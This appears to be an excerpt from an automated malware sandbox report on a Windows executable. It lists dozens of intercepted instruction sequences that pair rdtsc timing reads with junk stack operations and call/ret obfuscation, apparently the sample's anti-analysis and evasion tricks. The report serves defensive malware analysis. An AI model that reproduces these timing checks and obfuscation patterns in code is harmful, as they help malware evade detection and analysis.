                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1195857 second address: 119585B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 119B474 second address: 119B47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 119B47A second address: 119B48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F5D692C6EE6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 119B48B second address: 119B491 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1167239 second address: 116725C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5D692C6EF9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A2102 second address: 11A2123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D68C8C007h 0x00000009 jc 00007F5D68C8BFF6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A2123 second address: 11A2144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A22B5 second address: 11A22B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A22B9 second address: 11A22BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A22BF second address: 11A22C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A22C5 second address: 11A22CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A2A8C second address: 11A2A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A2A91 second address: 11A2A9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A333D second address: 11A3341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A3493 second address: 11A3499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A37D0 second address: 11A37D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A37D5 second address: 11A37DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5D692C6EE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A3B17 second address: 11A3B21 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5D68C8BFFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A4046 second address: 11A404A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A40FA second address: 11A411D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D68C8C008h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A411D second address: 11A4121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A4121 second address: 11A412F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F5D68C8BFF6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A44CB second address: 11A44D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A461F second address: 11A462D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A4C64 second address: 11A4C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F5D692C6EF9h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A565B second address: 11A5660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A659F second address: 11A6619 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F5D692C6EE8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 add edi, 5EBF4176h 0x00000029 xor esi, dword ptr [ebp+122D2CE6h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F5D692C6EE8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b mov si, 4B00h 0x0000004f push 00000000h 0x00000051 sub dword ptr [ebp+122D3A57h], eax 0x00000057 mov edi, dword ptr [ebp+122D2D2Eh] 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 js 00007F5D692C6EE6h 0x00000067 jc 00007F5D692C6EE6h 0x0000006d popad 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A6F66 second address: 11A6F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A6F6C second address: 11A6F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A9D0B second address: 11A9D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AD4E8 second address: 11AD4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AF600 second address: 11AF606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AF606 second address: 11AF65D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor edi, 14059895h 0x0000000f push 00000000h 0x00000011 xor edi, 6FEF6B76h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F5D692C6EE8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 add edi, dword ptr [ebp+122D2185h] 0x00000039 sbb di, 8538h 0x0000003e push eax 0x0000003f pushad 0x00000040 push ecx 0x00000041 jmp 00007F5D692C6EEAh 0x00000046 pop ecx 0x00000047 push edi 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A8F56 second address: 11A8F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B05F9 second address: 11B05FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B05FD second address: 11B0656 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F5D68C8BFFAh 0x0000000e mov di, EE27h 0x00000012 pop ebx 0x00000013 push 00000000h 0x00000015 jmp 00007F5D68C8BFFFh 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F5D68C8BFF8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 mov ebx, 01CE7400h 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e push ecx 0x0000003f jnl 00007F5D68C8BFF6h 0x00000045 pop ecx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B0656 second address: 11B065C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B065C second address: 11B0660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B24F6 second address: 11B251A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F5D692C6EEFh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5D692C6EECh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B251A second address: 11B253C instructions: 0x00000000 rdtsc 0x00000002 je 00007F5D68C8BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov edi, eax 0x0000000e push 00000000h 0x00000010 mov ebx, 1F4A9CB9h 0x00000015 mov edi, eax 0x00000017 push 00000000h 0x00000019 mov bx, di 0x0000001c push eax 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AE593 second address: 11AE597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B0796 second address: 11B079C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B1700 second address: 11B1733 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jo 00007F5D692C6EECh 0x00000011 jns 00007F5D692C6EE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F5D692C6EE6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B079C second address: 11B07A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B1733 second address: 11B17CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F5D692C6EE8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D33A4h], ebx 0x00000028 mov edi, eax 0x0000002a push dword ptr fs:[00000000h] 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F5D692C6EE8h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b push ecx 0x0000004c add ebx, dword ptr [ebp+122D2286h] 0x00000052 pop edi 0x00000053 add edi, 6C6A63EAh 0x00000059 mov dword ptr fs:[00000000h], esp 0x00000060 jmp 00007F5D692C6EF3h 0x00000065 mov eax, dword ptr [ebp+122D00C5h] 0x0000006b or edi, 5194547Ch 0x00000071 push FFFFFFFFh 0x00000073 or edi, 462CDCC7h 0x00000079 push eax 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d pushad 0x0000007e popad 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B2784 second address: 11B2789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AE6C2 second address: 11AE6D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D692C6EEEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B4513 second address: 11B4517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B17CC second address: 11B17DA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5D692C6EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AE6D4 second address: 11AE6D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B0892 second address: 11B0896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B4517 second address: 11B4532 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C003h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B17DA second address: 11B17DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B0896 second address: 11B089C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B6BB0 second address: 11B6C43 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5D692C6EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007F5D692C6EE6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F5D692C6EE8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 pushad 0x00000033 sub dword ptr [ebp+122D3373h], edx 0x00000039 popad 0x0000003a push 00000000h 0x0000003c mov ebx, 336A36BCh 0x00000041 push 00000000h 0x00000043 add di, FC2Ah 0x00000048 call 00007F5D692C6EF6h 0x0000004d jmp 00007F5D692C6EF8h 0x00000052 pop ebx 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F5D692C6EF2h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11BE24C second address: 11BE2E3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5D68C8BFFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F5D68C8BFF8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1DEFh], ebx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F5D68C8BFF8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 call 00007F5D68C8C005h 0x0000004c mov edi, 2656864Eh 0x00000051 pop ebx 0x00000052 push 00000000h 0x00000054 mov bl, ch 0x00000056 xchg eax, esi 0x00000057 push edx 0x00000058 jne 00007F5D68C8BFF8h 0x0000005e pop edx 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F5D68C8BFFCh 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B7D0B second address: 11B7D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, 00C1ED62h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 xor edi, 0C4B9E18h 0x0000001b mov ebx, dword ptr [ebp+122D1E1Fh] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F5D692C6EE8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000017h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov edi, dword ptr [ebp+122D2B16h] 0x00000048 mov eax, dword ptr [ebp+122D12D5h] 0x0000004e mov bx, 1EC1h 0x00000052 push FFFFFFFFh 0x00000054 mov ebx, dword ptr [ebp+122D2B5Ah] 0x0000005a nop 0x0000005b push edx 0x0000005c pushad 0x0000005d push ecx 0x0000005e pop ecx 0x0000005f jmp 00007F5D692C6EF4h 0x00000064 popad 0x00000065 pop edx 0x00000066 push eax 0x00000067 push eax 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11BE2E3 second address: 11BE2E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11C9C83 second address: 11C9C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F5D692C6EF1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11C9C9E second address: 11C9CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11C9CA3 second address: 11C9CB3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F5D692C6EE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11C9CB3 second address: 11C9CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11C952C second address: 11C9537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11C9537 second address: 11C9540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11C97D4 second address: 11C97FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F5D692C6EE6h 0x00000009 jmp 00007F5D692C6EF5h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5D692C6EEAh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11CDEF3 second address: 11CDF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F5D68C8BFF6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11CDF00 second address: 11CDF1C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5D692C6EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5D692C6EEDh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11CDF1C second address: 11CDF21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11CDF21 second address: 11CDF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F5D692C6EE6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11CDF37 second address: 11CDF3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11CDF3B second address: 11CDF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11CDF45 second address: 11CDF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3BC5 second address: 11D3BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F5D692C6EEFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3BDE second address: 11D3C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F5D68C8C004h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 pushad 0x00000012 jnl 00007F5D68C8BFF6h 0x00000018 je 00007F5D68C8BFF6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3119 second address: 11D3134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F5D692C6EEEh 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3134 second address: 11D3143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F5D68C8BFF6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
